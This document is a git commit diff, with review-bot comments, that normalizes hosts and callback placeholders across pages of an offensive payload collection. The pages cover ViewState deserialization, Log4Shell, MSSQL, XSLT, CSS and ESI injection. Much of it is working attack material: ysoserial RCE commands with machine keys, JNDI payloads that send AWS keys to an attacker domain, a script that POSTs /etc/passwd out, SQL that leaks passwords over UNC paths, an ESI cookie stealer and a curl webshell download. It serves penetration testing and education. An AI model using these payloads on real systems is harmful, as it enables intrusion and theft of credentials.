Normalize commands, callbacks and references

This commit is contained in:
Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions

View File

@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
``` ```
* [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
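Review bot: the target host is inconsistent within this hunk. The first three `cli.py` invocations still run against `http://update.microsoft.com/`, a real Microsoft host, while the last two were normalized to `http://10.10.10.10:8080/`. The page should not encourage pointing a machine-key brute-force tool at a third-party production host; use `http://10.10.10.10/` (or a target placeholder) for all five examples.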
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
### MAC Is Not Enabled ### MAC Is Not Enabled
```ps1 ```ps1
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
``` ```
### MAC Is Enabled And Encryption Is Disabled ### MAC Is Enabled And Encryption Is Disabled
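Review bot: replacing `powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName` with `cmd /c whoami` drops the out-of-band confirmation the original command relied on. A ViewState deserialization payload runs on the server without the command's output being reflected to the client, so a bare `whoami` gives the tester nothing to observe. Either keep a callback variant that follows the contributing rule (e.g. `nslookup [ATTACKER.DOMAIN.TLD]`) or add a sentence saying the output is not returned and must be confirmed another way. The same applies to the `--generator`, `--islegacy` and `compatibilityMode="Framework45"` examples below, where the previous payloads (`nslookup http://attacker.com`, `echo 123 > c:\windows\temp\test.txt`) were likewise observable.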
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
* Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used. * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
# --generator = `__VIEWSTATEGENERATOR` parameter value # --generator = `__VIEWSTATEGENERATOR` parameter value
# --validationkey = validation key from the previous command # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
* **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
``` ```
* **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"` * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
``` ```
## Edit Cookies With The Machine Key ## Edit Cookies With The Machine Key
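Review bot: the two bullets leave .NET Framework 4.5 itself uncovered, since the first says `< 4.5` and the second `> 4.5`. `compatibilityMode="Framework45"` applies to 4.5 and later, so the second bullet should read `>= 4.5`. Unrelated to the normalization, but worth fixing while the hunk is being touched.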

View File

@@ -33,17 +33,17 @@
### Account Takeover Through Password Reset Poisoning ### Account Takeover Through Password Reset Poisoning
1. Intercept the password reset request in Burp Suite 1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com` 2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
3. Forward the request with the modified header 3. Forward the request with the modified header
```http ```http
POST https://example.com/reset.php HTTP/1.1 POST https://example.com/reset.php HTTP/1.1
Accept: */* Accept: */*
Content-Type: application/json Content-Type: application/json
Host: attacker.com Host: [ATTACKER.DOMAIN.TLD]
``` ```
4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN` 4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
### Password Reset via Email Parameter ### Password Reset via Email Parameter
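Review bot: the example request still uses an absolute-form request line, `POST https://example.com/reset.php HTTP/1.1`, together with the poisoned `Host: [ATTACKER.DOMAIN.TLD]`. Per RFC 7230 §5.4 a server must ignore the `Host` header when the request-target is in absolute-form, so as written the example would not exercise the poisoned value. Use origin-form, `POST /reset.php HTTP/1.1`, so that `Host` is what the application reads.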
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data: 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
```powershell ```powershell
GET http://something.burpcollaborator.net HTTP/1.1 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
X: X:
``` ```
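Review bot: the fence is tagged ```powershell but contains a raw HTTP request line (`GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1`). The password-reset example on the same page uses ```http for the same kind of content; use that here and in the chunked variant that follows, so syntax highlighting matches what the reader is looking at.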
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
0 0
GET http://something.burpcollaborator.net HTTP/1.1 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
X: X X: X
``` ```
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
### Account Takeover via JWT ### Account Takeover via JWT
JSON Web Token might be used to authenticate an user. JSON Web Token might be used to authenticate a user.
* Edit the JWT with another User ID / Email * Edit the JWT with another User ID / Email
* Check for weak JWT signature * Check for weak JWT signature

View File

@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
- Payloads must be sanitized - Payloads must be sanitized
- Use `id`, and `whoami`, for RCE Proof of Concepts - Use `id`, and `whoami`, for RCE Proof of Concepts
- Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc. - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
- Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
- Use `Administrator` for privileged users and `User` for normal account - Use `Administrator` for privileged users and `User` for normal account
- Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
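Review bot: the rule list now fixes placeholders for callback domains and IP addresses, but says nothing about the target host, so examples across this commit still mix `example.com`, `victim.com` and real hosts such as `update.microsoft.com`. Consider adding a rule such as "Use `[TARGET.DOMAIN.TLD]` (or `example.com`) for the victim host" so the next normalization pass has something to normalize to. Minor grammar in the unchanged line: "when the payload require IP addresses" should be "requires".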

View File

@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
```css ```css
input[name="pin"][value="1234"] { input[name="pin"][value="1234"] {
background: url(https://attacker.com/log?pin=1234); background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
} }
``` ```
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
```css ```css
input[name="csrf-token"][value^="a"] + input { input[name="csrf-token"][value^="a"] + input {
background: url(https://example.com?q=a) background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
} }
``` ```
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks. This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
```html ```html
<style>@import url(http://attacker.com/staging?len=32);</style> <style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
<style>@import'//YOUR-PAYLOAD.oastify.com'</style> <style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
``` ```
Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles. Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.

View File

@@ -76,7 +76,7 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
So one can test blind formula injection or a potential for data exfiltration with: So one can test blind formula injection or a potential for data exfiltration with:
```text ```text
=IMPORTXML("http://[REDACTED]/csv", "//a/@href") =IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
``` ```
Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization. Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.

View File

@@ -45,13 +45,13 @@ bundle:config:db.password
## Scanning ## Scanning
* [log4j-scan](https://github.com/fullhunt/log4j-scan) * [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
```powershell ```powershell
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
[--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
``` ```
* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
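Review bot: the first example invocation passes `--run-all-test`, but the usage line directly above it shows the flag as `--run-all-tests`. argparse will usually accept an unambiguous prefix, but the example should spell the flag as the tool defines it. The port fix from `808` to `8080` in the second invocation is correct.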
@@ -59,16 +59,16 @@ bundle:config:db.password
## WAF Bypass ## WAF Bypass
```powershell ```powershell
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
# using lower and upper # using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} ${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} ${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter # using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
``` ```
## Exploitation ## Exploitation
@@ -76,32 +76,32 @@ ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attack
### Environment variables exfiltration ### Environment variables exfiltration
```powershell ```powershell
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
# AWS Access Key # AWS Access Key
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
``` ```
### Remote Command Execution ### Remote Command Execution
* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) * [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
```ps1 ```ps1
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
``` ```
* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) * [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
## References ## References
* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/) * [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) * [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) * [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
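Review bot: two things in this hunk. First, the rogue-jndi example is self-inconsistent: the command is started with `--hostname "10.10.10.10"`, yet every `Mapping ldap://...` line below it shows `10.10.10.11:1389`. The mapping output reflects the hostname the tool was given, so the two should use the same address (the original had the same mismatch between `192.168.1.21` and `192.168.1.10`, so this is a good moment to fix it). Second, the first environment-exfiltration payload, `${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/`, is missing its closing `}`; the AWS variant two lines down is balanced, so it is just a typo carried over from the previous version.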

View File

@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
```ps1 ```ps1
# -o, --output <file> Write to file instead of stdout # -o, --output <file> Write to file instead of stdout
curl http://evil.attacker.com/ -o webshell.php curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
``` ```
### Inside A Command ### Inside A Command

View File

@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
async function getFlag(){ async function getFlag(){
response = await fetch("file:///etc/passwd"); response = await fetch("file:///etc/passwd");
flag = await response.text(); flag = await response.text();
fetch("https://attacker.com/", { method: "POST", body: flag}) fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
}; };
getFlag(); getFlag();
</script> </script>
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
* Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices` * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
* Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
* Data stored in the settings (username, passwords, token): `chrome://settings` * Data stored in the settings (username, passwords, token): `chrome://settings`
* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>` * Port Scan: In a loop open `http://localhost:<port>/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=<port>`
* Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version` * Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
```json ```json

View File

@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
<xsl:template match="doc"> <xsl:template match="doc">
<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
<xsl:variable name="escaped" select="encode-for-uri($file)"/> <xsl:variable name="escaped" select="encode-for-uri($file)"/>
<xsl:variable name="attackerUrl" select="'http://attacker.com/'"/> <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/>
<xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/> <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>
<xsl:value-of select="unparsed-text($exploitUrl)"/> <xsl:value-of select="unparsed-text($exploitUrl)"/>
</xsl:template> </xsl:template>
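Review bot: the unchanged context line `<xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>` is missing the space between the `name` and `select` attributes, which makes the stylesheet malformed XML. Insert the space while this block is being edited.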

View File

@@ -304,14 +304,14 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
* **Permission**: Requires `VIEW SERVER STATE` permission on the server. * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
```powershell ```powershell
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null)) 1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
``` ```
* **Permission**: Requires the `CONTROL SERVER` permission. * **Permission**: Requires the `CONTROL SERVER` permission.
```powershell ```powershell
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default))) 1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default)) 1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
``` ```
### MSSQL UNC Path ### MSSQL UNC Path
@@ -319,21 +319,21 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
```sql ```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';--
``` ```
```sql ```sql
xp_dirtree '\\attackerip\file' xp_dirtree '\\10.10.10.10\file'
xp_fileexist '\\attackerip\file' xp_fileexist '\\10.10.10.10\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file' RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file' RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file' RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
``` ```
## MSSQL Trusted Links ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
-- Create a SQL user and give sysadmin privileges -- Create a SQL user and give sysadmin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2" EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2" EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
``` ```
## MSSQL Privileges ## MSSQL Privileges
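Review bot: `User` is a reserved keyword in T-SQL (it is also the built-in `USER` function), so `CREATE LOGIN User WITH PASSWORD = ...` will fail with a syntax error unless the name is bracketed as `[User]` or a non-reserved name is chosen. The same name is safe inside the string literal passed to `sp_addsrvrolemember` on the next line, but the login has to be created first for that call to succeed. Separately, `sp_addsrvrolemember` is deprecated; `ALTER SERVER ROLE sysadmin ADD MEMBER [User]` is the supported form and avoids the quoting issue entirely.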
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
### MSSQL Make User DBA ### MSSQL Make User DBA
```sql ```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
``` ```
## MSSQL Database Credentials ## MSSQL Database Credentials

View File

@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
| Description | Payload | | Description | Payload |
| ----------------------- | ---------------------------------------- | | ----------------------- | ---------------------------------------- |
| Blind detection | `<esi:include src=http://attacker.com>` | | Blind detection | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>` |
| XSS | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` | | XSS | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` | | Cookie stealer | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Include a file | `<esi:include src="supersecret.txt">` | | Include a file | `<esi:include src="supersecret.txt">` |
| Display debug info | `<esi:debug/>` | | Display debug info | `<esi:debug/>` |
| Add header | `<!--esi $add_header('Location','http://attacker.com') -->` | | Add header | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
| Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` | | Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist | | Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
